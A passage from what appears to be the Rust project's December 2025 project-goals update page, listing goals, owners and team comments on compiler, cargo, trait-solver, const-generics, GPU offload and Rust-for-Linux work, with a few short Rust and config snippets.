Originally the trait had a type Target ADT but this turned out to be unnecessary, as there is no reason to particularly disallow multiple coercion targets. The original reason for using an ADT to disallow multiple coercion targets was based on the trait also having an unsafe method, at which point unscrupulous users could use the trait as a generic coercion trait. Because the trait method was found to be unnecessary, the fear is also unnecessary.

This means that the trait has better chances of working with multiple coercing lifetimes (think a collection of &muts all coercing to &s, or only some of them). However, we are currently avoiding any support of multiple lifetimes as we want to avoid dealing with rmeta before we have the basic functionality working.

"Flexible, fast(er) compilation"

build-std (rust-lang/rust-project-goals#274)
Progress
Point of contact

David Wood

Champions

cargo (Eric Huss), compiler (David Wood), libs (Amanieu d'Antras)

Task owners

Adam Gemmell, David Wood

1 detailed update available.

Comment by @davidtwco posted on 2025-12-15:

rust-lang/rfcs#3873 is waiting on one checkbox before entering the final comment period. We had our sync meeting on the 11th and decided that we would enter FCP on rust-lang/rfcs#3874 and rust-lang/rfcs#3875 after rust-lang/rfcs#3873 is accepted. We've responded to almost all of the feedback on the next two RFCs and expect the FCP to act as a forcing-function so that the relevant teams take a look, they can always register concerns if there are things we need to address, and if we need to make any major changes then we'll restart the FCP.

Production-ready cranelift backend (rust-lang/rust-project-goals#397)
Progress Will not complete
Point of contact

Folkert de Vries

Champions

compiler (bjorn3)

Task owners

bjorn3, Folkert de Vries, [Trifecta Tech Foundation]

1 detailed update available.

Comment by @folkertdev posted on 2025-12-01:

We did not receive the funding we needed to work on this goal, so no progress has been made.

Overall I think the improvements we felt comfortable promising are on the low side. Overall the amount of time spent in codegen for realistic changes to real code bases was smaller than expected, meaning that the improvements that cranelift can deliver for the end-user experience are smaller.

We still believe larger gains can be made with more effort, but did not feel confident in promising hard numbers.

So for now, let's close this.

Promoting Parallel Front End (rust-lang/rust-project-goals#121)
Progress
Point of contact

Sparrow Li

Task owners

Sparrow Li

No detailed updates available.
Relink don't Rebuild (rust-lang/rust-project-goals#400)
Progress Will not complete
Point of contact

Jane Lusby

Champions

cargo (Weihang Lo), compiler (Oliver Scherer)

Task owners

@dropbear32, @osiewicz

No detailed updates available.

"Higher-level Rust"

Ergonomic ref-counting: RFC decision and preview (rust-lang/rust-project-goals#107)
Progress
Point of contact

Niko Matsakis

Champions

compiler (Santiago Pastorino), lang (Niko Matsakis)

Task owners

Niko Matsakis, Santiago Pastorino

No detailed updates available.
Stabilize cargo-script (rust-lang/rust-project-goals#119)
Progress
Point of contact

Ed Page

Champions

cargo (Ed Page), lang (Josh Triplett), lang-docs (Josh Triplett)

Task owners

Ed Page

1 detailed update available.

Comment by @epage posted on 2025-12-15:

Key developments

  • A fence length limit was added in response to T-lang feedback (https://github.com/rust-lang/rust/pull/149358)
  • Whether to disallow or lint for CR inside of a frontmatter is under discussion (https://github.com/rust-lang/rust/pull/149823)

Blockers

  • https://github.com/rust-lang/rust/pull/146377
  • rustdoc deciding on and implementing how they want frontmatter handled in doctests

"Unblocking dormant traits"

Evolving trait hierarchies (rust-lang/rust-project-goals#393)
Progress
Point of contact

Taylor Cramer

Champions

lang (Taylor Cramer), types (Oliver Scherer)

Task owners

Taylor Cramer, Taylor Cramer & others

1 detailed update available.

Comment by @cramertj posted on 2025-12-17:

Current status:

  • The RFC for auto impl supertraits has been updated to address SemVer compatibility issues.
  • There is a parsing PR kicking off an experimental implementation. The tracking issue for this experimental implementation is here.
In-place initialization (rust-lang/rust-project-goals#395)
Progress
Point of contact

Alice Ryhl

Champions

lang (Taylor Cramer)

Task owners

Benno Lossin, Alice Ryhl, Michael Goulet, Taylor Cramer, Josh Triplett, Gary Guo, Yoshua Wuyts

No detailed updates available.
Next-generation trait solver (rust-lang/rust-project-goals#113)
Progress
Point of contact

lcnr

Champions

types (lcnr)

Task owners

Boxy, Michael Goulet, lcnr

1 detailed update available.

Comment by @lcnr posted on 2025-12-15:

We've continued to fix a bunch of smaller issues over the last month. Tim (Theemathas Chirananthavat) helped uncover a new potential issue due to non-fatal overflow which we'll have to consider before stabilizing the new solver: https://github.com/rust-lang/trait-system-refactor-initiative/issues/258.

I fixed two issues myself in https://github.com/rust-lang/rust/pull/148823 and https://github.com/rust-lang/rust/pull/148865.

tiif with help by Boxy fixed query cycles when evaluating constants in where-clauses: https://github.com/rust-lang/rust/pull/148698.

@adwinwhite fixed a subtle issues involving coroutine witnesses in https://github.com/rust-lang/rust/pull/149167 after having diagnosed the underlying issue there last month. They've also fixed a smaller diagnostics issue in https://github.com/rust-lang/rust/pull/149299. Finally, they've also fixed an edge case of impl well-formedness checking in https://github.com/rust-lang/rust/pull/149345.

Shoyu Vanilla fixed a broken interaction of aliases and fudging in https://github.com/rust-lang/rust/pull/149320. Looking into fudging and HIR typeck Expectation handling also uncovered a bunch of broken edge-cases and I've openedhttps://github.com/rust-lang/rust/issues/149379 to track these separately.

I have recently spent some time thinking about the remaining necessary work and posted a write-up on my personal blog: https://lcnr.de/blog/2025/12/01/next-solver-update.html. I am currently trying to get a clearer perspective on our cycle handling while slowly working towards an RFC for the changes there. This is challenging as we don't have a good theoretical foundation here yet.

Stabilizable Polonius support on nightly (rust-lang/rust-project-goals#118)
Progress
Point of contact

Rémy Rakic

Champions

types (Jack Huey)

Task owners

Amanda Stjerna, Rémy Rakic, Niko Matsakis

2 detailed updates available.

Comment by @lqd posted on 2025-12-30:

This month's key developments were:

  • borrowck support in a-mir-formality has been progressing steadily - it has its own dedicated updates in https://github.com/rust-lang/rust-project-goals/issues/122 for more details
  • we were also able to find a suitable project for the master's student project on a-mir-formality (and they accepted and should start around February) and which will help expand our testing coverage for the polonius alpha as well.
  • tiif has kept making progress on fixing opaque type soundness issue https://github.com/rust-lang/trait-system-refactor-initiative/issues/159. It is the one remaining blocker for passing all tests. By itself it will not immediately fix the two remaining (soundness) issues with opaque type region liveness, but we'll able to use the same supporting code to ensure the regions are indeed live where they need to be.
  • I quickly cleaned up some inefficiencies in constraint conversion, it hasn't landed yet but it maybe won't need to because of the next item
  • but most of the time this month was spent on this final item: we have the first interesting results from the rewriting effort. After a handful of wrong starts, I have a branch almost ready to switch the constraint graph to be lazy and computed during traversal. It removes the need to index the numerous list of constraints, or to convert liveness data to a different shape. It thus greatly reduces the current alpha overhead (some rare cases look faster than NLLs but I don't yet know why, maybe due to being able to better use the sparseness, low connectivity of the constraint graph, and a small number of loans). The overhead wasn't entirely removed of course: the worst offending benchmark has a +5% wall-time regression, but icounts are worse looking (+13%). This was also only benchmarking the algorithm itself, without the improvements to the rest of borrowck mentioned in previous updates. I should be able to open a PR in the next couple days, once I figure out how to best convert the polonius mermaid graph dump to the new lazy localized constraint generation.
  • and finally, happy holidays everyone!
Comment by @lqd posted on 2025-12-31:
  • I should be able to open a PR in the next couple days

done in https://github.com/rust-lang/rust/pull/150551

Goals looking for help


Other goal updates

Add a team charter for rustdoc team (rust-lang/rust-project-goals#387)
Progress Completed
Point of contact

Guillaume Gomez

Champions

rustdoc (Guillaume Gomez)

No detailed updates available.
Borrow checking in a-mir-formality (rust-lang/rust-project-goals#122)
Progress
Point of contact

Niko Matsakis

Champions

types (Niko Matsakis)

Task owners

Niko Matsakis, tiif

4 detailed updates available.

Comment by @nikomatsakis posted on 2025-12-03:

PR https://github.com/rust-lang/a-mir-formality/pull/206 contains a "first draft" for the NLL rules. It checks for loan violations (e.g., mutating borrowed data) as well as some notion of outlives requirements. It does not check for move errors and there aren't a lot of tests yet.

Comment by @nikomatsakis posted on 2025-12-03:

The PR also includes two big improvements to the a-mir-formality framework:

  • support for (for_all) rules that can handle "iteration"
  • tracking proof trees, making it much easier to tell why something is accepted that should not be
Comment by @nikomatsakis posted on 2025-12-10:

Update: opened https://github.com/rust-lang/a-mir-formality/pull/207 which contains support for &mut, wrote some new tests (including one FIXME), and added a test for NLL Problem Case #3 (which behaved as expected).

One interesting thing (cc Ralf Jung) is that we have diverged from MiniRust in a few minor ways:

  • We do not support embedding value expressions in place expressions.
  • Where MiniRust has a AddrOf operator that uses the PtrType to decide what kind of operation it is, we have added a Ref MIR operation. This is in part because we need information that is not present in MiniRust, specifically a lifetime.
  • We have also opted to extend goto with the ability to take multiple successors, so that goto b1, b2 can be seen as "goto either b1 or b2 non-deterministically" (the actual opsem would probably be to always go to b1, making this a way to add "fake edges", but the analysis should not assume that).
Comment by @nikomatsakis posted on 2025-12-17:

Update: opened https://github.com/rust-lang/a-mir-formality/pull/210 with today's work. We are discussing how to move the checker to support polonius-alpha. To that end, we introduced feature gates (so that a-mir-formality can model nightly features) and did some refactoring of the type checker aiming at allowing outlives to become flow-sensitive.

C++/Rust Interop Problem Space Mapping (rust-lang/rust-project-goals#388)
Progress
Point of contact

Jon Bauman

Champions

compiler (Oliver Scherer), lang (Tyler Mandry), libs (David Tolnay)

Task owners

Jon Bauman

No detailed updates available.
Comprehensive niche checks for Rust (rust-lang/rust-project-goals#262)
Progress
Point of contact

Bastian Kersting

Champions

compiler (Ben Kimock), opsem (Ben Kimock)

Task owners

Bastian Kersting], Jakob Koschel

No detailed updates available.
Const Generics (rust-lang/rust-project-goals#100)
Progress
Point of contact

Boxy

Champions

lang (Niko Matsakis)

Task owners

Boxy, Noah Lev

3 detailed updates available.

Comment by @BoxyUwU posted on 2025-12-30:

Since the last update both of my PRs I mentioned have landed, allowing for constructing ADTs in const arguments while making use of generic parameters. This makes MGCA effectively a "full" prototype where it can now fully demonstrate the core concept of the feature. There's still a lot of work left to do but now we're at the point of finishing out the feature :)

Once again huge thanks to camelid for sticking with me throughout this. Also thanks to errs, oli and lcnr for reviewing some of the work and chatting with me about possible impl decisions.

Some examples of what is possible with MGCA as of the end of this goal cycle:

#![feature(const_default, const_trait_impl, min_generic_const_args)]

trait Trait {
    #[type_const]
    const ASSOC: usize;
}

fn mk_array<T: const Default + Trait>() -> [T; T::ASSOC] {
    [const { T::default() }; _]
}
#![feature(adt_const_params, min_generic_const_args)]

fn foo<const N: Option<u32>>() {}

trait Trait {
    #[type_const]
    const ASSOC: usize;
}

fn bar<T: Trait, const N: u32>() {
    // the initializer of `_0` is a `N` which is a legal const argument
    // so this is ok.
    foo::<{ Some::<u32> { 0: N } }>();

    // this is allowed as mgca supports uses of assoc consts in the
    // type system. ie `<T as Trait>::ASSOC` is a legal const argument
    foo::<{ Some::<u32> { 0: <T as Trait>::ASSOC } }>();

    // this on the other hand is not allowed as `N + 1` is not a legal
    // const argument
    foo::<{ Some::<u32> { 0: N + 1 } }>(); // ERROR
}

As for adt_const_params we now have a zulip stream specifically for discussion of the upcoming RFC and the drafting of the RFC: #project-const-generics/adt_const_params-rfc. I've gotten part of the way through actually writing the RFC itself though it's gone slower than I had originally hoped as I've also been spending more time thinking through the implications of allowing private data in const generics.

I've debugged the remaining two ICEs making adt_const_params not fully ready for stabilization and written some brief instructions on how to resolve them. One ICE has been incidentally fixed (though more masked) by some work that Kivooeo has been doing on MGCA. The other has been picked up by someone I'm not sure the github handle of so that will also be getting fixed soon.

Comment by @BoxyUwU posted on 2025-12-30:

Ah I forgot to mention, even though MGCA has a tonne of work left to do I expect it should be somewhat approachable for people to help out with. So if people are interested in getting involved now is a good time :)

Comment by @BoxyUwU posted on 2025-12-30:

Ah another thing I forgot to mention. David Wood spent some time looking into the name mangling scheme for adt_const_params stuff to make sure it would be fine to stabilize and it seems it is so that's another step closer to adt_const_params being stabilizable

Continue resolving `cargo-semver-checks` blockers for merging into cargo (rust-lang/rust-project-goals#104)
Progress
Point of contact

Predrag Gruevski

Champions

cargo (Ed Page), rustdoc (Alona Enraght-Moony)

Task owners

Predrag Gruevski

No detailed updates available.
Develop the capabilities to keep the FLS up to date (rust-lang/rust-project-goals#391)
Progress
Point of contact

Pete LeVasseur

Champions

bootstrap (Jakub Beránek), lang (Niko Matsakis), spec (Pete LeVasseur)

Task owners

Pete LeVasseur, Contributors from Ferrous Systems and others TBD, t-spec and contributors from Ferrous Systems

1 detailed update available.

Comment by @PLeVasseur posted on 2025-12-16:

Meeting notes here: FLS team meeting 2025-12-12

Key developments: We're close to completing the FLS release for 1.91.0, 1.91.1. We've started to operate as a team, merging a PR with the changelog entries, then opening up issues for each change required: ✅ #624(https://github.com/rust-lang/fls/issues/624), ✅ #625(https://github.com/rust-lang/fls/issues/625), ✅ #626(https://github.com/rust-lang/fls/issues/626), ⚠️ #623(https://github.com/rust-lang/fls/issues/623). #623(https://github.com/rust-lang/fls/issues/623) is still pending, as it requires a bit of alignment with the Reference on definitions and creation of a new example. Blockers: None currently Help wanted: We'd love more folks from the safety-critical community to contribute to picking up issues or opening an issue if you notice something is missing.

Emit Retags in Codegen (rust-lang/rust-project-goals#392)
Progress
Point of contact

Ian McCormack

Champions

compiler (Ralf Jung), opsem (Ralf Jung)

Task owners

Ian McCormack

1 detailed update available.

Comment by @icmccorm posted on 2025-12-16:

Here's our December status update!

  • We have revised our prototype of the pre-RFC based on Ralf Jung's feedback. Now, instead of having two different retag functions for operands and places, we emit a single __rust_retag intrinsic in every situation. We also track interior mutability precisely. At this point, the implementation is mostly stable and seems to be ready for an MCP.

  • There's been some discussion here and in the pre-RFC about whether or not Rust will still have explicit MIR retag statements. We plan on revising our implementation so that we no longer rely on MIR retags to determine where to insert our lower-level retag calls. This should be a relatively straightforward change to the current prototype. If anything, it should make these changes easier to merge upstream, since they will no longer affect Miri.

  • BorrowSanitizer continues to gain new features, and we've started testing it on our first real crate (lru) (which has uncovered a few new bugs in our implementation). The two core Tree Borrows features that we have left to support are error reporting and garbage collection. Once these are finished, we will be able to expand our testing to more real-world libraries and confirm that we are passing each of Miri's test cases (and likely find more bugs lurking in our implementation). Our instrumentation pass ignores global and thread-local state for now, and it does not support atomic memory accesses outside of atomic load and store instructions. These operations should be relatively straightforward to add once we've finished higher-priority items.

  • Performance is slow. We do not know exactly how slow yet, since we've been focusing on feature support over benchmarking and optimization. This is at least partially due to the lack of garbage collection, based on what we're seeing from profiling. We will have a better sense of what our performance is like once we can compare against Miri on more real-world test cases.

As for what's next, we plan on posting an MCP soon, now that it's clear that we will be able to do without MIR retags. You can expect a more detailed status update on BorrowSanitizer by the end of January. This will discuss our implementation and plans for 2026. We will post that here and on our project website.

Expand the Rust Reference to specify more aspects of the Rust language (rust-lang/rust-project-goals#394)
Progress
Point of contact

Josh Triplett

Champions

lang-docs (Josh Triplett), spec (Josh Triplett)

Task owners

Amanieu d'Antras, Guillaume Gomez, Jack Huey, Josh Triplett, lcnr, Mara Bos, Vadim Petrochenkov, Jane Lusby

1 detailed update available.

Comment by @joshtriplett posted on 2025-12-17:

In addition to further ongoing work on reference material (some of which is on track to be merged), we've had some extensive discussions about reference processes, maintenance, and stability markers. Niko Matsakis is putting together a summary and proposal for next steps.

Finish the libtest json output experiment (rust-lang/rust-project-goals#255)
Progress
Point of contact

Ed Page

Champions

cargo (Ed Page)

Task owners

Ed Page

No detailed updates available.
Finish the std::offload module (rust-lang/rust-project-goals#109)
Progress
Point of contact

Manuel Drehwald

Champions

compiler (Manuel Drehwald), lang (TC)

Task owners

Manuel Drehwald, LLVM offload/GPU contributors

2 detailed updates available.

Comment by @ZuseZ4 posted on 2025-12-02:

It's only been two weeks, but we got a good number of updates, so I already wanted to share them.

autodiff

  1. On the autodiff side, we landed the support for rlib and better docs. This means that our autodiff frontend is "almost" complete, since there are almost no cases left where you can't apply autodiff. There are a few features like custom-derivatives or support for dyn arguments that I'd like to add, but they are currently waiting for better docs on the Enzyme side. There is also a long-term goal off replacing the fat-lto requirement with the less invasive embed-bc requirement, but this proved to be tricky in the past and only affects compile times.
  2. @sgasho picked up my old PR to dlopen enzyme, and found the culprit of it failing after my last rebase. A proper fix might take a bit longer, but it might be worth waiting for. As a reminder, using dlopen in the future allows us to ship autodiff on nightly without increasing the size of rustc and therefore without making our infra team sad.

All in all, we have landed most of the hard work here, so that's a very comfortable position to be in before enabling it on nightly.

offload

  1. We have landed the intrinsic implementation of Marcelo Domínguez, so now you can offload functions with almost arbitrary arguments. In my first prototype, I had limited it to pointers to 256 f64 values. The updated usage example continues to live here in our docs. As you can see, we still require #[cfg(target_os=X)] annotations. Under the hood, the LLVM-IR which we generate is also still a bit convoluted. In his next PRs, he'll clean up the generated IR, and introduce an offload macro that users shall call instead of the internal offload intrinsic.
  2. I spend more time on enabling offload in our CI, to enable std::offload in nightly. After multiple iterations and support from LLVM offload devs, we found a cmake config that does not run into bugs, should not increase Rust CI time too much, and works with both in-tree llvm/clang builds, as well as external clang's (the current case in our Rust CI).
  3. I spend more time on simplifying the usage instructions in the dev guide. We started with two cargo calls, one rustc call, two clang calls, and two clang-helper binary calls. I was able to remove the rustc and one of the clang-offload-packager calls, by directly calling the underlying LLVM APIs. I also have an unmerged PR which removes the two clang calls. Once I cleaned it up and landed it, we would be down to only two cargo calls and one binary call to clang-linker-wrapper. Once I automated this last wrapper (and enabled offload in CI), nightly users should be able to experiment with std::offload.
Comment by @ZuseZ4 posted on 2025-12-26:

Time for the next round of updates. Again, most of the updates were on the GPU side, but with some notable autodiff improvements too.

autodiff:

  1. @sgasho finished his work on using dlopen to load enzyme and the pr landed. This allowed Jakub Beránek and me to start working on distributing Enzyme via a standalone component.

  2. As a first step, I added a nicer error if we fail to find or dlopen our Enzyme backend. I also removed most of our autodiff fallbacks, we now unconditionally enable our macro frontend on nightly: https://github.com/rust-lang/rust/pull/150133 You may notice that cargo expand now works on autodiff code. This also allowed the first bug reports about ICE (internal compiler error) in our macro parser logic.

  3. Kobzol opened a PR to build Enzyme in CI. In theory, I should have been able to download that artifact, put it into my sysroot, and use the latest nightly to automatically load it. If that had worked, we could have just merged his PR, and everyone could have started using AD on nightly. Of course, things are never that easy. Even though both Enzyme, LLVM, and rustc were built in CI, the LLVM version shipped along with rustc does not seem compatible with the LLVM version Enzyme was built against. We assume some slight cmake mismatch during our CI builds, which we will have to debug.

offload:

  1. On the gpu side, Marcelo Domínguez finished his cleanup PR, and along the way also fixed using multiple kernels within a single codebase. When developing the offload MVP I had taken a lot of inspiration from the LLVM-IR generated by clang - and it looks like I had gotten one of the (way too many) LLVM attributes wrong. That caused some metadata to be fused when multiple kernels are present, confusing our offload backend. We started to find more bugs when working on benchmarks, more about the fixes for those in the next update.

  2. I finished cleaning up my offload build PR, and Oliver Scherer reviewed and approved it. Once the dev-guide gets synced, you should see much simpler usage instructions. Now it's just up to me to automate the last part, then you can compile offload code purely with cargo or rustc. I also improved how we build offload, which allows us to build it both in CI and locally. CI had some very specific requirements to not increase build times, since our x86-64-dist runner is already quite slow.

  3. Our first benchmarks directly linked against NVIDIA and AMD intrinsics on llvm-ir level. However, we already had an nvptx Rust module for a while, and since recently also an amdgpu module which nicely wraps those intrinsics. I just synced the stdarch repository into rustc a few minutes ago, so from now on, we can replace both with the corresponding Rust functions. In the near future we should get a higher level GPU module, which abstracts away naming differences between vendors.

  4. Most of my past rustc contributions were related to LLVM projects or plugins (Offload and Enzyme), and I increasingly encountered myself asking other people for updates or backports of our LLVM submodule, since upstream LLVM has fixes which were not yet merged into our LLVM submodule. Our llvm working group is quite small and I didn't want to burden them too much with my requests, so I recently asked them to join it, which also got approved. In the future I intend to help a little with the maintenance here.

Getting Rust for Linux into stable Rust: compiler features (rust-lang/rust-project-goals#407)
Progress
Point of contact

Tomas Sedovic

Champions

compiler (Wesley Wiser)

Task owners

(depending on the flag)

1 detailed update available.

Comment by @tomassedovic posted on 2025-12-05:

Update from the 2025-12-03 meeting:

-Zharden-sls

Wesley reviewed it again, provided a qualification, more changes requested.

Getting Rust for Linux into stable Rust: language features (rust-lang/rust-project-goals#116)
Progress
Point of contact

Tomas Sedovic

Champions

lang (Josh Triplett), lang-docs (TC)

Task owners

Ding Xiang Fei

2 detailed updates available.

Comment by @tomassedovic posted on 2025-12-05:

Update from the 2025-12-03 meeting.

Deref / Receiver

Ding keeps working on the Reference draft. The idea is still not well-proliferated and people are not convinced this is a good way to go. We hope the method-probing section in Reference PR could clear thins up.

We're keeping the supertrait auto-impl experiment as an alternative.

RFC #3851: Supertrait Auto-impl

Ding addressed Predrag's requests on SemVer compatibility. He's also opened an implementation PR: https://github.com/rust-lang/rust/pull/149335. Here's the tracking issue: https://github.com/rust-lang/rust/issues/149556.

derive(CoercePointee)

Ding opened a PR to require additional checks for DispatchFromDyn: https://github.com/rust-lang/rust/pull/149068

In-place initialization

Ding will prepare material for a discussion at the LPC (Linux Plumbers Conference). We're looking to hear feedback on the end-user syntax for it.

The feature is going quite large, Ding will check with Tyler on the whether this might need a series of RFCs.

The various proposals on the table continue being discussed and there are signs (albeit slow) of convergence. The placing function and guaranteed return ones are superseded by outpointer. The more ergonomic ideas can be built on top. The guaranteed value placement one would be valuable in the compiler regardless and we're waiting for Olivier to refine it.

The feeling is that we've now clarified the constraints that the proposals must operate under.

Field projections

Nadri's Custom places proposal is looking good at least for the user-facing bits, but the whole thing is growing into a large undertaking. Benno's been focused on academic work that's getting wrapped up soon. The two will sync afterwards.

Comment by @tomassedovic posted on 2025-12-18:

Quick bit of great news: Rust in the Linux kernel is no longer treated as an experiment, it's here to stay 🎉

https://lwn.net/SubscriberLink/1050174/63aa7da43214c3ce/

Implement Open API Namespace Support (rust-lang/rust-project-goals#256)
Progress
Point of contact

Help Wanted

Champions

cargo (Ed Page), compiler (b-naber), crates-io (Carol Nichols)

Task owners

b-naber, Ed Page

3 detailed updates available.

Comment by @sladyn98 posted on 2025-12-03:

Ed Page hey i would like to contribute to this I reached out on zulip. Bumping up the post in case it might have gone under the radar

CC Niko Matsakis

Comment by @epage posted on 2025-12-03:

The work is more on the compiler side atm, so Eric Holk and b-naber could speak more to where they could use help.

Comment by @eholk posted on 2025-12-06:

Hi @sladyn98 - feel free to ping me on Zulip about this.

MIR move elimination (rust-lang/rust-project-goals#396)
Progress
Point of contact

Amanieu d'Antras

Champions

lang (Amanieu d'Antras)

Task owners

Amanieu d'Antras

1 detailed update available.

Comment by @Amanieu posted on 2025-12-17:

The RFC draft was reviewed in detail and Ralf Jung pointed out that the proposed semantics introduce issues because they rely on "no-behavior" (NB) with regards to choosing an address for a local. This can lead to surprising "time-traveling" behavior where the set of possible addresses that a local may have (and whether 2 locals can have the same address) depends on information from the future. For example:

// This program has DB
let x = String::new();
let xaddr = &raw const x;
let y = x; // Move out of x and de-initialize it.
let yaddr = &raw const y;
x = String::new(); // assuming this does not change the address of x
// x and y are both live here. Therefore, they can't have the same address.
assume(xaddr != yaddr);
drop(x);
drop(y);
// This program has UB
let x = String::new();
let xaddr = &raw const x;
let y = x; // Move out of x and de-initialize it.
let yaddr = &raw const y;
// So far, there has been no constraint that would force the addresses to be different.
// Therefore we can demonically choose them to be the same. Therefore, this is UB.
assume(xaddr != yaddr);
// If the addresses are the same, this next line triggers NB. But actually this next
// line is unreachable in that case because we already got UB above...
x = String::new();
// x and y are both live here.
drop(x);
drop(y);

With that said, there is still a possibility of achieving the optimization, but the scope will need to be scaled down a bit. Specifically, we would need to:

  • no longer perform a "partial free"/"partial allocation" when initializing or moving out of a single field of a struct. The lifetime of a local starts when any part of it is initialized and ends when it is fully moved out.
  • allow a local's address to change when it is re-initialized after having been fully moved out, which eliminates the need for NB.

This reduces the optimization opportunities since we can't merge arbitrary sub-field moves, but it still allows for eliminating moves when constructing a struct from multiple values.

The next step is for me to rework the RFC draft to reflect this.

Prototype a new set of Cargo "plumbing" commands (rust-lang/rust-project-goals#264)
Progress
Point of contact

Help Wanted

Task owners

Help wanted, Ed Page

No detailed updates available.
Prototype Cargo build analysis (rust-lang/rust-project-goals#398)
Progress
Point of contact

Weihang Lo

Champions

cargo (Weihang Lo)

Task owners

Help wanted Weihang Lo, Weihang Lo

2 detailed updates available.

Comment by @weihanglo posted on 2025-12-13:

Key developments: HTML replay logic has merge. Once it gets into nightly cargo report timings can open the timing report you have previously logged.

  • https://github.com/rust-lang/cargo/pull/16377
  • https://github.com/rust-lang/cargo/pull/16378
  • https://github.com/rust-lang/cargo/pull/16382

Blockers: No, except my own availability

Help wanted: Same as https://github.com/rust-lang/rust-project-goals/issues/398#issuecomment-3571897575

Comment by @weihanglo posted on 2025-12-26:

Key developments:

Headline: You should always enable build analysis locally, if you are using nightly and want the timing info data always available.

[unstable]
build-analysis = true

[build.analysis]
enabled = true
  • More log events are emitted: https://github.com/rust-lang/cargo/pull/16390
    • dependency resolution time
    • unit-graph construction
    • unit-registration (which contain unit metadata)
  • Timing replay from cargo report timings now has almost the same feature parity as cargo build --timings, except CPU usage: https://github.com/rust-lang/cargo/pull/16414
  • Rename rebuild event to unit-fingerprint, and is emitted also for fresh unit: https://github.com/rust-lang/cargo/pull/16408.
  • Proposed a new cargo report sessions command so that people can retrieve previous sessions IDs not use the latest one: https://github.com/rust-lang/cargo/pull/16428
  • Proposed to remove --timings=json which timing info in log files should be a great replacement: https://github.com/rust-lang/cargo/pull/16420
  • Documenting efforts for having man pages for nested commands `cargo report : https://github.com/rust-lang/cargo/pull/16430 and https://github.com/rust-lang/cargo/pull/16432

Besides implementations, we also discussed about:

  • The interaction of --message-format and structured logging system, as well as log event schemas and formats: https://rust-lang.zulipchat.com/#narrow/channel/246057-t-cargo/topic/build.20analysis.20log.20format/with/558294271
  • A better name for RunId. We may lean towards SessionId which is a common name for logging/tracing ecosystem.
  • Nested Cargo calls to have a sticky session ID. At least a way to show they were invoked from the same top-level Cargo call.

Blockers: No, except my own availability

Help wanted: Same as https://github.com/rust-lang/rust-project-goals/issues/398#issuecomment-3571897575

reflection and comptime (rust-lang/rust-project-goals#406)
Progress
Point of contact

Oliver Scherer

Champions

compiler (Oliver Scherer), lang (Scott McMurray), libs (Josh Triplett)

Task owners

oli-obk

1 detailed update available.

Comment by @oli-obk posted on 2025-12-15:

Updates

  • https://github.com/rust-lang/rust/pull/148820 adds a way to mark functions and intrinsics as only callable during CTFE
  • https://github.com/rust-lang/rust/pull/144363 has been unblocked and just needs some minor cosmetic work

Blockers

  • https://github.com/rust-lang/rust/pull/146923 (reflection MVP) has not been reviewed yet
Rework Cargo Build Dir Layout (rust-lang/rust-project-goals#401)
Progress
Point of contact

Ross Sullivan

Champions

cargo (Weihang Lo)

Task owners

Ross Sullivan

1 detailed update available.

Comment by @ranger-ross posted on 2025-12-23:

Status update December 23, 2025

The majority of December was spent iterating on https://github.com/rust-lang/cargo/pull/16155 . As mentioned in the previous update, the original locking design was not correct and we have been working through other solutions.

As locking is tricky to get right and there are many scenarios Cargo needs to support, we are trying to descope the initial implementation to an MVP, even if that means we lose some of the concurrency. Once we have an MVP on nightly, we can start gathering feedback on the scenarios that need improvement and iterate.

I'm hopeful that we get an unstable -Zfine-grain-locking on nightly in January for folks to try out in their workflows.


Also we are considering adding an opt-in for the new build-dir layout using an env var (CARGO_BUILD_DIR_LAYOUT_V2=true) to allow tool authors to begin migrating to the new layout. https://github.com/rust-lang/cargo/pull/16336

Before stabilizing this, we are doing crater run to test the impact of the changes and proactively reaching out to projects to minimize breakage as much as possible. https://github.com/rust-lang/rust/pull/149852

Run more tests for GCC backend in the Rust's CI (rust-lang/rust-project-goals#402)
Progress Completed
Point of contact

Guillaume Gomez

Champions

compiler (Wesley Wiser), infra (Marco Ieni)

Task owners

Guillaume Gomez

No detailed updates available.
Rust Stabilization of MemorySanitizer and ThreadSanitizer Support (rust-lang/rust-project-goals#403)
Progress
Point of contact

Jakob Koschel

Task owners

[Bastian Kersting](https://github.com/1c3t3a), [Jakob Koschel](https://github.com/jakos-sec)

1 detailed update available.

Comment by @jakos-sec posted on 2025-12-15:

Based on the gathered feedback I opened a new MCP for the proposed new Tier 2 targets with sanitizers enabled. (https://github.com/rust-lang/compiler-team/issues/951)

Rust Vision Document (rust-lang/rust-project-goals#269)
Progress
Point of contact

Niko Matsakis

Task owners

vision team

No detailed updates available.
rustc-perf improvements (rust-lang/rust-project-goals#275)
Progress
Point of contact

James

Champions

compiler (David Wood), infra (Jakub Beránek)

Task owners

James, Jakub Beránek, David Wood

1 detailed update available.

Comment by @Kobzol posted on 2025-12-15:

We have enabled the second x64 machine, so we now have benchmarks running in parallel 🎉 There are some smaller things to improve, but next year we can move onto running benchmarks on Arm collectors.

Stabilize public/private dependencies (rust-lang/rust-project-goals#272)
Progress
Point of contact

Help Wanted

Champions

cargo (Ed Page)

Task owners

Help wanted, Ed Page

No detailed updates available.
Stabilize rustdoc `doc_cfg` feature (rust-lang/rust-project-goals#404)
Progress
Point of contact

Guillaume Gomez

Champions

rustdoc (Guillaume Gomez)

Task owners

Guillaume Gomez

1 detailed update available.

Comment by @GuillaumeGomez posted on 2025-12-17:

Opened stabilization PR but we have blockers I didn't hear of, so stabilization will be postponed until then.

SVE and SME on AArch64 (rust-lang/rust-project-goals#270)
Progress
Point of contact

David Wood

Champions

compiler (David Wood), lang (Niko Matsakis), libs (Amanieu d'Antras)

Task owners

David Wood

3 detailed updates available.

Comment by @davidtwco posted on 2025-12-15:

I haven't made any progress on Deref::Target yet, but I have been focusing on landing rust-lang/rust#143924 which has went through two rounds of review and will hopefully be approved soon.

Comment by @nikomatsakis posted on 2025-12-18:

Update: David and I chatted on Zulip. Key points:

David has made "progress on the non-Sized Hierarchy part of the goal, the infrastructure for defining scalable vector types has been merged (with them being Sized in the interim) and that'll make it easier to iterate on those and find issues that need solving".

On the Sized hierarchy part of the goal, no progress. We discussed options for migrating. There seem to be three big options:

(A) The conservative-but-obvious route where the T: Derefin the old edition is expanded to T: Deref<Target: SizeOfVal> (but in the new edition it means T: Deref<Target: Pointee>, i.e., no additional bounds). The main downside is that new Edition code using T: Deref can't call old Edition code using T: Deref as the old edition code has stronger bounds. Therefore new edition code must either use stronger bounds than it needs or wait until that old edition code has been updated.

(B) You do something smart with Edition.Old code where you figure out if the bound can be loose or strict by bottom-up computation. So T: Deref in the old could mean either T: Deref<Target: Pointee> or T: Deref<Target: SizeOfVal>, depending on what the function actually does.

